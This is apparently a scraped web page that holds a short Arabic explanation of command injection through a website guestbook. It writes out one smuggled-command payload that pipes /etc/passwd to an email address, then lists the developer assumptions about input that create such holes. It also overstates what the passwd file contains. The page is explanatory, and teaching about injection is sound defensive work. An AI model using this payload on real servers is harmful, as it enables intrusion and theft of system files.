books a simple example of injection programming
If you do not find what you're looking for, you can use more accurate words.
مثال بسيط على البرمجة بالحقن (Info)
معظم خادمات الويب تحتوي على "دفتر الزوار" لكتابة بعض الملاحظات، وهو ما يستقبل عادة رسائل صغيرة من المستخدمين، والتي من المكن أن تكون: "لقد زرت الموقع .. وكان رائعاً جداً" .. ولكن المخترق ومن خلال هذه التقنية يستطيع أن يصل إلى معلومات ما على الجهاز الخادم، وذلك بإضافته لبعض الجمل البرمجية في هذه المساحة، والتي من الممكن أن تكون هذه الجملة :
; cat /etc/passwd | email [email protected] #
والتي من خلالها سيبعث جهاز الخادم بالملف المدعو (passwd) إلى بريد المخترق، مزودةً بجميع كلمات السر الموجودة عند الجهاز الخادم، وهو ما سيُحدث مشاكل كثيرة لزائري هذا الموقع. أغلب هذا المشاكل تحدث مرتبطة بالافتراضات الخاطئة – كما ذكرنا سابقاً- عن الإدخالات المحتملة للنظام، أو تأثير بعض البيانات على هذا النظام. وبعض الأمثلة على هذه الافتراضات التي يقوم مطور النظام عند الإدخال للبرنامج هي:
- افتراضات متعلقة ببعض الأحرف والأرقام التي ليس لها معنى مباشر، وإنما تحتوي على معاني مميزة للبرامج الحاسوبية، ويفترض عندها المبرمج أنها لن تستخدم للإدخال، ولكن المخترقين لكون لهم رأي آخر.
- الافتراض بأن الأرقام فقط تستخدم للإدخال.
- الافتراض بأن حجم الإدخال لن يتجاوز الحجم المحدد الذي وضعه المبرمج.
- الافتراض بأنه من الصحيح أن يتم استخدام المؤشرات أو أدلة المصفوفات من خلال الصندوق المخصص للإدخال.
- الافتراض بأن القيم المحددة من قبل الخادم للمستخدم، لا يمكن تغييرها بواسطة الأخير. وهذا الافتراض يقود لأخطار أخرى إضافة لخطر البرمجة بالحقن.
